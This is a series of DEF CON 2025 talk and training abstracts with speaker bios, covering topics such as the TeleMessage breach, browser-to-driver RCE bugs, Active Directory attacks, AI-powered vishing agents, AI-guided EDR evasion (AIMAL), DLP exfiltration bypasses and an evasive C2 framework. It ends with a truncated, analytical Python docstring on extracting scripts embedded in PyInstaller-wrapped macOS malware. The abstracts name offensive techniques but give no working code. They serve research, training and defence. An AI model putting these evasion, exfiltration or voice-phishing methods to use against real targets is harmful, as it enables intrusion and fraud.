In March, former national security advisor Mike Waltz accidentally invited a journalist into his war crimes Signal group with other senior Trump officials. “We are currently clean on OPSEC,” secretary of defense Pete Hegseth posted to the group. In May, Waltz was photographed clandestinely checking his Signal messages under the table during a cabinet meeting.
Only it turns out, Waltz was actually using a knock-off of Signal called TM SGNL. Immediately after that, TeleMessage (the company that makes TM SGNL) was hacked, and the hacker was able to access plaintext Signal messages. It was then hacked again, and the second hacker exfiltrated hundreds of gigabytes of data before TeleMessage took its service offline.
This talk is about the entire TeleMessage saga: the history of the company, which was founded by a former Israeli spook; its customers – Trump officials, US Customs and Border Protection, crypto firms, etc.; how TeleMessage archives Signal, WhatsApp, Telegram, WeChat, and SMS messages; an analysis of the TM SGNL source code that proves the company lied about supporting end-to-end encryption; the trivial exploit that was used to extract data from TeleMessage’s archive server; and how I analyzed hundreds of gigabytes of memory dumps full of chat logs from TeleMessage customers.
Micah is a member of the Lockdown Systems collective. He's a coder, a security researcher, and an independent journalist. He develops open source privacy and security tools, and he's done a lot of work related to journalism and whistleblowing. He’s the former director of infosec for The Intercept. He wrote a book that teaches people how to analyze hacked and leaked datasets, Hacks, Leaks, and Revelations. He really doesn’t like the technofascist future we’ve all been forced into.
What would it take to start a movement away from the major platforms, for people to #reclaimtech for themselves from the clutches of multi-billion dollar companies and VC backed unicorns, retrieving our data, our autonomy, and our sovereignty? We are a collection of conscientious objectors to the Big Tech ecosystems building community around peer-to-peer support and connection as we exit from these extractive ecosystems. Opting out of toxic systems, we believe, is not about digital minimalism but about opting in to stronger connections, more ethical systems, and a better future. In this talk, the Founders of Tech Reclaimers introduce our approach to bringing tech sovereignty to the masses: meeting people where they are, joining them on their journey, building confidence step by step, and fostering community in the process.
Speakers: Janet Vertesi, Andy Hull
Janet Vertesi (she/hers) is associate professor of sociology at Princeton University, where she is well known for her "opt out experiments" to evade tracking by data companies and embrace alternative tech systems, as well as for her in-depth studies of NASA's teams. An expert in the nexus between technology and society, she is a mobile Linux evangelist, teaches courses in critical technical practice and design, and sits on the advisory boards of the Data & Society Institute and the Electronic Privacy Information Center. Ask her how to make sure the Internet doesn't know that you're pregnant.
SpeakerBio: Andy Hull, Reclaim Tech (https://www.reclaimcontrol.tech/)
Andy Hull (he/him) has been abusing computers since they came with cassettes and not enough RAM. He dabbles with recreational hacking, enjoys a spot of light homelabbing, and still dreams of being a Demoscener next year. Andy believes that computers should be tools that set us free and enshrine our rights as humans, not abusive platforms that imprison and enrage us.
The path from a working demo to an AI vishing agent that can survive in the wild is littered with failed calls and bad prompts. We walked that path so you don't have to. This talk is a rapid-fire rundown of 10 lessons learned from taking a bot into production. We'll dive into: how to craft pretexts that don't collapse under pressure, the dirty secrets of managing conversational latency, and the surprising challenge of handling accents and background noise. I'll break down the trade-offs between self-hosted models and commercial API infrastructure, their inherent limitations, and the privacy considerations to address. Learn how to tune prompts for believable improvisation and avoid the uncanny valley.
Speakers: Matt Holland, Enrico Faccioli
Matt Holland is a startup co-founder and CISO who builds security solutions designed for the real world. His career has taken him from leading security for iconic brands like Unilever and the John Lewis Partnership to his current role as co-founder of vishr.ai, a venture tackling the threat of AI-driven social engineering. His approach is a product of that journey. He tackles every challenge by blending the strategic discipline of a global CISO, the commercial focus of an MBA, the relentless drive of a startup founder, and the adversarial mindset needed to counter modern threats.
SpeakerBio: Enrico Faccioli
Enrico Faccioli is a London-based entrepreneur tackling AI-driven social engineering. His latest venture, vishr.ai, uses conversational AI to provide employees with realistic vishing simulations and hands-on training. Following his MSc in Finance from Warwick Business School, he moved from overseeing the tech strategy for L&G's real assets funds (£28bn AUM), into startup leadership as COO of the geospatial AI startup Gyana, before a breach of his own fuelled a pivot into solving critical security challenges.
Bloatware. We all hate it, and most of us are good at avoiding it. But some vendor tools – especially those managing critical drivers – can be useful when the Windows Update versions aren’t good enough for performance-critical computing.
What started as a routine driver update took a sharp turn when I confirmed a reboot modal… from my browser. Wait, my browser shouldn’t be able to do that!? To my disappointment (and maybe some surprise), it turned out to be arbitrary code execution – right from the browser. This kicked off a week-long deep dive, uncovering seven CVEs in seven days across several prominent vendors, all exploiting a common pattern: privileged services managing software on Windows with little regard for security.
In this talk, I’ll walk through the journey of discovery and exploitation of several vulnerabilities that lead to LPE/RCE. I'll cover everything from the initial attack surface discovery and reverse engineering to the final exploitation of several vulnerabilities. By the end, participants will probably be uninstalling similar software mid-session. While the exploitation journey is fun and impactful, this isn’t the kind of “access everywhere” anyone wants. It’s 2025 – we have everything we need to do better.
SpeakerBio: Leon "leonjza" Jacobs
With over two decades in IT - 15 years focused on cybersecurity - Leon is the CTO of Orange Cyberdefense’s SensePost Team. His career has taken him from a Tier 1 ISP, a private investment bank and now into full-time consulting, giving him a broad, real-world view of security challenges across industries. Today, Leon spends his time researching and hacking everything from enterprise networks to web and mobile applications. Passionate about building and innovating, he’s a regular contributor to the InfoSec community, sharing tools, insights, and lessons learned to help push the field forward.
This 2-day hands-on training teaches the concepts, tools, and techniques to analyze, investigate, and hunt malware by combining two powerful techniques: malware analysis and memory forensics. This course will introduce attendees to the basics of malware analysis, reverse engineering, Windows internals, and memory forensics. Then it gradually progresses into more advanced concepts of malware analysis & memory forensics. Attendees will learn to perform static, dynamic, code, and memory analysis. To keep the training completely practical, it consists of various scenario-based hands-on labs after each module, which involve analyzing real-world malware samples and investigating malware-infected memory images (crimeware, APT malware, fileless malware, rootkits, etc.). This hands-on training is designed to help attendees gain a better understanding of the subject in a short period. Throughout the course, the attendees will learn the latest techniques used by adversaries to compromise and persist on the system. In addition, it also covers various code injection, hooking, and rootkit techniques used by adversaries to bypass forensic tools and security products. In this training, you will also understand how to integrate malware analysis and memory forensics techniques into a custom sandbox to automate malware analysis. After taking this course, attendees will be better equipped with the skills to analyze, investigate, hunt, and respond to malware-related incidents.
Whether you are a beginner interested in learning malware analysis, threat hunting, and memory forensics from scratch or an experienced professional who would like to enhance your existing skills to perform a forensic investigation to respond to an incident or for fun, this training will help you accomplish your goals.
Note: Students will be provided with real-world malware samples, malware-infected memory images, course material, lab solution manual, video demos, custom scripts, and a Linux VM.
Attendees should walk away with the following skills:
Sajan Shetty is a cybersecurity enthusiast. He is an active member of Cysinfo, an open cybersecurity community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, and HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.
SpeakerBio: Monnappa "Monnappa22" K A, Co-Founder at Cysinfo
Monnappa K A is a security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.
Welcome to accessDenied, a high-stakes, hands-on tabletop experience where you're not just playing cards… you're protecting critical infrastructure. Imagine trying to secure your facilities, water, power, communication, while your so-called “allies” across the table spot every vulnerability you missed. And you? You're doing the same to them. In this game, you'll simulate cyber attacks, defend your systems, and learn how breaches ripple through networks, all through fast-paced, strategic play based on real-world incidents like the Maroochy Water hack and the Kyiv power grid attack.
🔍 Who Should Play?
🎯 What You’ll Learn
accessDenied isn't just for fun, it’s designed to educate non-cybersecurity players and create smarter conversations about digital threats to critical infrastructure. Whether you're a hacker, a healthcare nerd, or just want to try something new, this tabletop challenge belongs in your DEF CON lineup.
SpeakerBio: Jack Voltaic, RIT
United States military installations and their surrounding communities share an interest in the resiliency of cyber-critical infrastructure systems. In addition to civil-military interdependencies, a failure in one critical infrastructure sector can cause cascading effects across others. ACI launched the Jack Voltaic (JV) initiative to address gaps and build resilience. Beginning with the first exercise (JV 1.0) in 2016, these exercises addressed multi-sector cyber-critical infrastructure challenges.
The exercises are civil-military; local, community level; multi-sector; and unclassified.
With JV 4.0, ACI’s critical infrastructure resilience program will mature and transition. Through partnerships with other academic and policy communities, ACI seeks to foster the growth of JV-inspired practices. Multiple initiatives through 2025 will build upon the momentum and lessons of JV 1.0 - 3.0.
More than 95% of Fortune 500 companies use Active Directory! Enterprises are managed using Active Directory (AD), and it often forms the backbone of the complete enterprise network. Therefore, to secure an enterprise from an adversary, it is essential to secure its AD environment. To secure AD, you must understand the different techniques and attacks used by adversaries against it. Often burdened with maintaining backward compatibility and interoperability with a variety of products, AD environments frequently lack the ability to tackle the latest threats.
This training is aimed towards attacking modern AD with focus on OPSEC and Stealth. The training is based on real world penetration tests and Red Team engagements for highly secured environments. Some of the techniques used in the course:
The course is a mixture of fun, demos, exercises, hands-on and lecture. You start from compromise of a user desktop and work your way up to multiple forest pwnage. The training focuses more on methodology and techniques than tools.
Attendees will get two months of free access to an Active Directory environment comprising multiple domains and forests, during and after the training, and a Certified Red Team Expert (CRTE) certification exam attempt.
Speakers: Nikhil, Manthan
Nikhil’s areas of interest include red teaming, Azure and Active Directory security, attack research, defense strategies and post-exploitation research. He has 15+ years of experience in red teaming.
He specializes in assessing security risks in secure environments that require novel attack vectors and an "out of the box" approach. He has worked extensively on Azure and Active Directory attacks, defense, and bypassing detection mechanisms. Nikhil has held trainings and bootcamps for various corporate clients (in the US, Europe and SE Asia), and at the world's top information security conferences.
He has spoken/trained at conferences like DEF CON, BlackHat, BruCON and more.
Nikhil is the founder of Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/
SpeakerBio: Manthan, Security Researcher at Altered Security
Manthan is a security researcher with a strong passion for enterprise security, red teaming and Active Directory security. He specializes in testing enterprise security defences with a deep understanding of offensive strategies, including EDR evasion and Active Directory attacks. He continuously researches emerging threats, attack techniques, and mitigation strategies to stay ahead of evolving adversaries.
He works as a Security Researcher at Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/
When you are reverse engineering a file and have to repeatedly perform the same mundane task, you start to wonder how to perform the action automatically. This workshop provides the basis for automating tasks with Ghidra. We will look at a wiper used to target Ukrainian victims in late February 2022.
This four-hour workshop primarily focuses on how to automate repeated activities and how to think in a way that is supported by the analysis framework’s API. You can transfer this knowledge to other reverse engineering suites, although the specific API calls will differ. This class is perfect for aspiring and beginning analysts, while also providing background information and additional techniques for intermediate analysts.
The workshop’s materials consist of multiple malware samples; the precautions for handling them will be explained in detail during the workshop, ensuring the safety and integrity of the attendees' systems. An x86_64 laptop with Ubuntu 22.04 or later, along with Ghidra, Eclipse, and OpenJDK 21, is required. It's mandatory to be able to understand the basics of assembly language and decompiled code, and to be able to read and write Java. Python 2 can be used as a substitute if desired, but is not fully supported.
SpeakerBio: Max "Libra" Kersten, Trellix
Max Kersten is a malware analyst, blogger, and speaker who aims to make malware analysis more approachable for those who are starting. In 2019, Max graduated cum laude with a bachelor's in IT & Cyber Security, during which Max also worked as an Android malware analyst. Currently, Max works as a senior malware analyst at Trellix, where he analyses APT malware and creates open-source tooling to aid such research. Over the past few years, Max spoke at international conferences, such as DEFCON, Black Hat (USA, EU, MEA, Asia), Botconf, Confidence-Conference, HackYeahPL, and HackFestCA. Additionally, he gave guest lectures and workshops for DEFCON, Botconf, several universities, and private entities.
AIMAL (Artificially Intelligent Malware Launcher) is a modular red team framework built to simulate advanced malware evasion techniques against modern AV/EDR/IDS solutions. It supports Process Herpaderping, Process Hollowing, Thread Hijacking, Process Ghosting, and many other evasion techniques as delivery mechanisms, with stealth enhancements including PPID spoofing, shellcode polymorphism, syscall mutation (Hell's Gate), and aggressive AMSI/ETW bypassing. AIMAL adapts to simulated detection responses through a feedback loop that mutates behavior on the fly, rotating techniques until the payload bypasses detection. Integration with the OpenAI API allows AIMAL to suggest the best evasion strategy based on alert context, helping simulate the decision-making process of advanced threat actors. Designed for research, red teaming, and adversarial simulation, AIMAL brings real-world stealth techniques into a clean, testable interface. Live demo will include payload staging, detection simulation, and mutation in action.
Speakers: Endrit Shaqiri, Natyra Shaqiri
Endrit Shaqiri is an offensive security researcher, red team tool developer, and international karate champion currently pursuing his Master’s in Cybersecurity Engineering and Cryptography at Istanbul Technical University. He is also admitted to Boston University’s Master’s in Artificial Intelligence program, where he plans to continue his research on AI-powered malware and adaptive evasion systems. He is the creator of AIMaL — the Artificially Intelligent Malware Launcher — a modular framework designed for simulating modern malware evasion techniques against AV/EDR/IDS systems. Endrit has built a tool that bridges hands-on malware development with AI-assisted mutation logic. His passion lies in crafting adaptive malware simulation frameworks for red teamers, researchers, and students alike. This is his first appearance at DEF CON, bringing a glimpse of how tomorrow’s adversaries may automate and evolve in real-time.
SpeakerBio: Natyra Shaqiri
Natyra Shaqiri is a cybersecurity student at Southern Maine Community College with a growing focus on malware analysis, system security, and ethical hacking. As co-developer of AIMAL — the Artificially Intelligent Malware Launcher — Natyra has contributed to the design and modularization of the tool’s evasion techniques, helping implement feedback-driven mutation logic and stealth strategy testing. She is passionate about adversarial security, system internals, and hands-on red team simulation frameworks. This marks her debut at DEF CON, where she brings the perspective of a rising cybersecurity engineer.
AirBleed is a proof-of-concept hack demonstrating a hidden communication technique leveraging a little-known vulnerability in macOS's Bluetooth property list files (Bluetooth.plist). By fragmenting payloads into tiny pieces and injecting them into device caches that go unnoticed by standard security tools, this capability enables operatives to establish dead-drop channels for passing critical data — all without arousing suspicion. [1] Stealth-by-Design: Uses legitimate Bluetooth device caches to hide encrypted payloads up to 248 bytes per fragment. [2] Dual-Use Impact: Enables clandestine communication or counter-plotter operations by law enforcement and intel. [3] Live Demo: DEFCON demo will allow attendees to send their own Bluetooth plist payloads to a vulnerable MacBook Pro. [4] Implications: Offers a novel toolkit for counterintelligence to monitor — and disrupt — hidden networks and dead drops.
Speakers: Ray "CURZE$" Cervantes, Yvonne "Von Marie" Cervantes
Ray is an offensive security engineer and counterintelligence innovator with a background in forensic psychology, turning aggressive tradecraft into powerful defense tools. He is currently researching facial behavioral analysis and creating AI-driven solutions for the legal and trial consulting fields. ChatGPT, Copilot, and Claude all predict that his work will land him in handcuffs within 5–10 years — a risk Ray embraces as proof he’s pushing the boundaries of security and innovation.
SpeakerBio: Yvonne "Von Marie" Cervantes
Yvonne is a YouTube craft content creator and handmade crafter featured in craft magazines for her work on unique art pieces. She currently designs for four design company teams and also creates comic books with Ray. She is currently researching facial behavioral analysis through designing research ideas and strategies for improving the legal and trial consulting fields.
The Commodore 64 home computer, which sold at least 12.5 million units from 1982 to 1994, was widely used during a formative early decade in the subcultures of hacking, phreaking, piracy, and cybercrime. Like ancient insects trapped in amber, discovered and studied millions of years later, ephemera of hacker history have been fortuitously preserved in the file system structures of C64 floppy disks from the 1980s and 90s.
Enthusiasts and researchers have created byte-for-byte copies of disks in order to preserve games, applications, and demos of the time period. What is less obvious, however, is that users of the time tended to reuse disks, deleting old files to make space for new programs. This and other use patterns have resulted in interesting data being retained in unallocated sectors alongside the overtly-accessible programs and data. Often, this data can be recovered and includes logs of online sessions, hacker text files, and more.
In this talk, Dr. McGrew describes software and workflow he developed to perform forensic processing and full-text indexing of over 650,000 unique C64 floppy disk images from publicly-accessible online archives. He will also present interesting findings from searches and analysis that illustrate, for the modern audience, day-to-day hacker communications and tools of the past.
Dr. Wesley McGrew is a house music DJ that also directs research, development, and offensive cyber operations as Senior Cybersecurity Fellow for MartinFederal. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA and teaches self-designed courses on software reverse engineering and assembly language programming. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.
Angry Magpie is an open-source toolkit that demonstrates critical bypasses in enterprise Data Loss Prevention (DLP) systems through browser-based techniques. Our research identifies a class of attacks — Data Splicing — that enable exfiltration of sensitive data by transforming it to evade detection patterns used by both proxy and endpoint DLP solutions. The toolkit showcases four primary techniques: data sharding, ciphering, transcoding, and channel smuggling, each demonstrating specific architectural limitations in current DLP implementations. Security teams can use Angry Magpie to test their defense mechanisms against these practical attacks, providing valuable insights for enhancing data protection strategies. With browsers now serving as the primary access point for enterprise data, understanding and addressing these vulnerabilities has become essential for maintaining effective data security posture. Special thanks to Pankaj Sharma from the SquareX research team for his contributions to Angry Magpie toolkit.
Speakers: Jeswin Mathai, Xian Xiang Chang
Jeswin leads the design and implementation of SquareX’s infrastructure. Previously, he was part of Pentester Academy (acquired by INE) where he was responsible for managing the whole lab platform that was used by thousands of customers. A seasoned speaker and researcher, Jeswin has showcased his work at prestigious international stages such as DEF CON US, DEF CON China, RootCon, Black Hat Arsenal, and Demo Labs at DEF CON. He has also imparted his knowledge globally, training in-class sessions at Black Hat US, Asia, HITB, RootCon, and OWASP NZ Day. Jeswin is also the creator of popular open-source projects such as AWSGoat, AzureGoat, and PAToolkit.
SpeakerBio: Xian Xiang Chang
Xian is a software engineer at SquareX, contributing to the industry's first browser detection and response solution. With deep technical expertise in browser security, he architected DetectiveSQ, a containerized system for dynamically analyzing Chrome extensions, earning recognition at Black Hat Asia Arsenal and exemplifying his ability to transform complex security challenges into practical defensive tools.
“Anatomy of Telecom Malware” is a Telecom Village talk spanning 2G, 3G, 4G/LTE and cloud-native 5G. It dissects how attackers weaponise every layer of the stack—SS7/SIGTRAN, Diameter, GTP, SMPP and SBA APIs—while adding three critical lenses:
Attendees leave with a telecom-specific kill-chain map, protocol-aware detection tricks, and a 10-point hardening checklist to protect both legacy and future networks.
SpeakerBio: Akib Sayyed, Founder at Matrix Shell
Akib Sayyed is the Founder and Chief Security Consultant of Matrix-Shell Technologies, an India-based telecom-security firm he established in 2014. Recognised industry-wide as a 5G and telecom-signalling security specialist, Akib has spent more than a decade helping mobile-network operators, MVNOs and regulators uncover and remediate vulnerabilities across legacy (2G/3G/4G) and next-generation (5G Core, VoLTE/VoNR/VoWi-Fi) networks. His expertise spans protocol penetration testing (SS7, Diameter, GTP), radio-access assessments and security-automation tooling.
Under Akib’s leadership, Matrix-Shell has grown into India’s first NCCS-designated 5G Core security test lab and holds ISO/IEC 17025 accreditation for its methodology and results. A frequent conference speaker and Black Hat trainer, he also co-organises the Telecom Village community, where he shares latest threat-intel and open-source tools with the wider security ecosystem.
Across consulting engagements, Akib is known for delivering:
Driven by a mission to “secure the core,” Akib continues to advise operators on rolling out resilient 5G infrastructure, mentors the next wave of telecom-security engineers and contributes to global standards bodies shaping the future of mobile-network defence.
Apple Intelligence, Apple’s newest AI product, is designed to enhance productivity with AI while maintaining Apple's focus on user experience and privacy, often highlighting its use of localized models as a key advantage. But how well do these assurances hold up under scrutiny? While Apple emphasizes privacy as a core principle, my findings challenge some of these claims, illustrating the importance of scrutinizing AI-driven assistants before widespread adoption.
In this talk, we take a closer look at the data flows within Apple Intelligence, examining how it interacts with user data and the potential security and privacy risks that come with it. Using traffic analysis and OS inspection techniques, we explore what information is accessed, how it moves through the system, and where it gets transmitted. Our findings challenge common security assumptions of Apple, revealing unexpected behaviors and data leaks. From encrypted traffic to data leakage concerns, this presentation will provide practical insights for users and security professionals alike.
SpeakerBio: Yoav Magid
Yoav Magid is a security researcher at Lumia Security, where his work centers on AI security. Yoav’s other topics of interest are social engineering and embedded operating systems. With a solid foundation in cybersecurity, Yoav holds a B.Sc. in Computer Science and is currently preparing to pursue an MBA.
Bringing over seven years of cyber security experience, he has honed his skills in embedded research and programming, tackling real-world challenges in high-stakes environments. Yoav also founded a large-scale LGBTQIA+ Employee Resource Group (ERG) that fosters international collaboration and support in his last organization.
Electronic Frontier Foundation (EFF) is excited to be back at DEF CON. Our expert panelists will offer brief updates on EFF's work defending your digital rights, before opening the floor for attendees to ask their questions. This dynamic conversation centers challenges DEF CON attendees actually face, and is an opportunity to connect on common causes.
This year you’ll meet:
Hannah is a senior staff attorney who focuses on criminal justice, privacy, and cybersecurity issues, and is part of the Coders’ Rights Project.
SpeakerBio: Alexis Hancock, Director of Engineering at EFF
Alexis is an expert technologist and researcher on the security vulnerabilities which plague consumer electronics, and can speak to the disparate impact they have on communities.
SpeakerBio: Cooper "CyberTiger" Quintin, Senior Staff Technologist at EFF
Cooper Quintin is a senior public interest technologist with the EFF Threat Lab. He has given talks about security research at prestigious security conferences including Black Hat, DEFCON, Shmoocon, and ReCon about issues ranging from IMSI Catcher detection to Femtech privacy issues to newly discovered APTs. He has two children and is very tired.
Cooper has many years of security research experience on tools of surveillance used by government agencies.
SpeakerBio: Lisa Femia, Staff Attorney at EFF
Lisa focuses on surveillance, privacy, free speech, and the impact of technology on civil rights and civil liberties.
SpeakerBio: Thorin Klosowski
Thorin is the Security and Privacy Activist at EFF, where he focuses on providing practical advice on protecting online security, including handling much of Surveillance Self-Defense.
Rapid advancements in AI raise important concerns about cybersecurity risks. While existing work shows AI still falls short of human expertise in cybersecurity, we aim to identify indicators of emerging capabilities and risks by studying the gap between AI and expert human performance. We compare top hackers—selected for their proven track record in security research and competitions—with AI systems attempting to exploit real and synthetic targets. This comparison helps us pinpoint where current frontier model evaluations fall short, what tacit knowledge is needed to exploit vulnerabilities effectively, and how these gaps might be addressed. By distilling the expertise, intuition, and problem-solving approaches that make human experts more effective than current foundation models, we highlight the unique skills that continue to differentiate human practitioners. Conversely, we seek to identify areas where AI’s latent capabilities may offer distinct advantages, helping experts better leverage these tools in their work. Our work aims to improve AI cybersecurity evaluations, address critical gaps in evidence-based policymaking, and better equip practitioners to adapt to shifts in the offense/defense landscape.
SpeakerBio: Justin W. Lin
In today's interconnected world, software development relies heavily on third-party components---up to 80% of your code could come from external sources. This reliance creates a complex web of dependencies, making your software supply chain a prime target for cybercriminals. Securing it is no longer optional; it's essential.
This hands-on course takes a comprehensive approach to attacking and securing the software supply chain. In the first section, you'll assume the role of a sophisticated attacker, infiltrating an enterprise through its supply chain partners. You'll learn how to compromise developer laptops, code repositories, CI/CD pipelines, internal registries, and even production environments. Once you've seen how vulnerabilities can be exploited, we'll pivot to defense.
In the second section, we'll build and secure a GitHub organization, configure repositories, and implement best practices to mitigate risks. You'll learn how to secure IaC (Infrastructure as Code) assets, validate third-party code, and remediate vulnerabilities to ensure end-to-end protection.
Through practical exercises, you'll apply these strategies to safeguard your developer environments, CI/CD pipelines, and production systems. By the end of the course, you'll have the knowledge and tools to turn your software supply chain into a security strength rather than a liability.
SpeakerBio: Anant Shrivastava
Anant Shrivastava is a highly experienced information security professional with over 15 years of corporate experience. He is a frequent speaker and trainer at international conferences, and is the founder of Cyfinoid Research, a cyber security research firm. He leads open source projects such as Tamer Platform and CodeVigilant, and is actively involved in information security communities such as null, OWASP and various BSides Chapters and DefCon groups.
Attack Flow Detector is an open-source tool that helps defenders uncover coordinated cyber attacks buried in noisy alert data. Instead of relying on LLMs or black-box AI, it uses explainable machine learning to map alerts, logs, and telemetry to MITRE ATT&CK techniques, cluster them into contextualized attack steps, and chain them into complete killchains. Built for blue teamers and SOC analysts, it's lightweight, interpretable, and easy to deploy in real environments. This demo will show how the tool processes real-world-style data, generates actionable tickets, and supports root cause analysis. If you're drowning in false positives or lone incidents, this is for you.
Speakers: Ezz Tahoun, Kevin Shi
Ezz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.
SpeakerBio: Kevin Shi
Kevin is a data scientist specializing in cybersecurity and machine learning, currently working at the Canadian Institute for Cybersecurity at the University of New Brunswick. He holds a Master’s degree in Data Science from the University of Windsor, where he focused on applying advanced analytics and machine learning techniques to complex cybersecurity problems. His expertise includes developing and optimizing AI-driven methods for threat detection, anomaly identification, and security event analysis. His research contributions emphasize practical implementations of data science in cybersecurity operations, bridging theoretical approaches with real-world applications.
Watch teams deploy AI-powered agents in a soundproof booth to place live vishing calls and hit preset objectives, pushing the limits of automation, hacking, and human psychology.
The Beaconator C2 framework provides multiple highly evasive payloads, created to provide red teams with code execution, versatility, and ease of use. It is intended to be a Swiss Army knife for evasive C2, with a unified listener and basic tools to manage an engagement. The goal is to empower red/purple teams to emulate emerging adversary tactics that are evasive, prove them out, and then open tickets with various AV/EDR vendors to improve detectability for these blind spots that are now exploited in the wild.
Speakers: Mike "CroodSolutions" Manrod, Ezra "Shammahwoods" Woods
Mike serves as the CISO for Grand Canyon Education and adjunct faculty for Grand Canyon University, teaching malware analysis. Mike also co-founded the Threat Intelligence Support Unit (TISU), a community for threat and adversary research. He is also a co-author/contributor for the joint book project, Understanding New Security Threats published by Routledge in 2019, along with numerous articles. When not working, he spends time playing video games and doing random projects with his kids.
SpeakerBio: Ezra "Shammahwoods" Woods
Ezra is an avid security researcher currently working as an information security engineer with Grand Canyon Education.
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration.
We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.
Speakers: Sam Bowne, Kaitlyn Handelman, Irvin Lemus, Elizabeth Biddlecome
Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.
SpeakerBio: Kaitlyn Handelman, Offensive Security Engineer at Amazon
Kaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.
SpeakerBio: Irvin Lemus, Cyber Range Engineer at By Light IT Professional Services
Irvin Lemus, CISSP, is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."
SpeakerBio: Elizabeth Biddlecome, Consultant and Instructor
Elizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to scripting languages in cybersecurity competitions, hackathons, and CTFs.
Payments infrastructure is often built with strong security and reliability guarantees, but those guarantees can be undermined by failures in the systems it depends on. In this talk, we examine postmortems from real-world outages where the core payments systems remained robust, yet external or supporting infrastructure such as DNS, authentication services, cloud dependencies, or third-party integrations introduced vulnerabilities during periods of instability.
SpeakerBio: Tapan Khilnani
Tapan is an engineering manager with deep experience in building and scaling payment systems. With a background that spans global enterprises and early-stage startups, he brings a well-rounded perspective to technical and organizational challenges. He holds an engineering master’s degree, which grounds his practical work in strong technical foundations.
When confronted with malicious macOS binaries, analysts typically reach for a disassembler and immerse themselves in the complexities of low-level assembly. But what if this tedious process could be skipped entirely?
While many malware samples are distributed as native macOS binaries (easily run with a simple double-click), they frequently encapsulate scripts hidden within executable wrappers. Leveraging frameworks such as PyInstaller, Appify, Tauri, and Platypus, malware authors embed their scripts with binaries, complicating traditional analysis. Although these frameworks share the goal of producing natively executable binaries, each employs a distinct method to embed scripts, thus necessitating tailored extraction tools and approaches.
Using real-world macOS malware (such as Shlayer, CreativeUpdate, GravityRAT, and many others), we'll first demonstrate how to identify these faux binaries and then how to efficiently extract or reconstruct their embedded scripts, bypassing the disassembler entirely!
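As an added illustration of the "skip the disassembler" approach described above (this is not code from the talk or from Objective-See), the following Python locates a PyInstaller CArchive appended to a native stub, walks its table of contents and pulls the embedded script out without looking at a single instruction. The cookie and TOC layouts follow PyInstaller's own CArchive writer; everything else is assumed for the demonstration: the sample "binary" is constructed inline, its entry names and payload are made up, and its 's' entry holds plain source so the result is readable, whereas a real PyInstaller build stores a marshalled code object there that you would still have to decompile.

```python
"""Locate a PyInstaller CArchive appended to a native stub, walk its table of
contents and extract the embedded script, with no disassembly involved.

CArchive layout (as written by PyInstaller's CArchiveWriter):
    [native stub][entry data ...][TOC][cookie]
    cookie (88 bytes, '!8sIIii64s'): magic, archive length, TOC offset,
        TOC length, python version, pylib name
    TOC row ('!iIIIBc' + name): row length, data position, compressed length,
        uncompressed length, compression flag (1 = zlib), typecode
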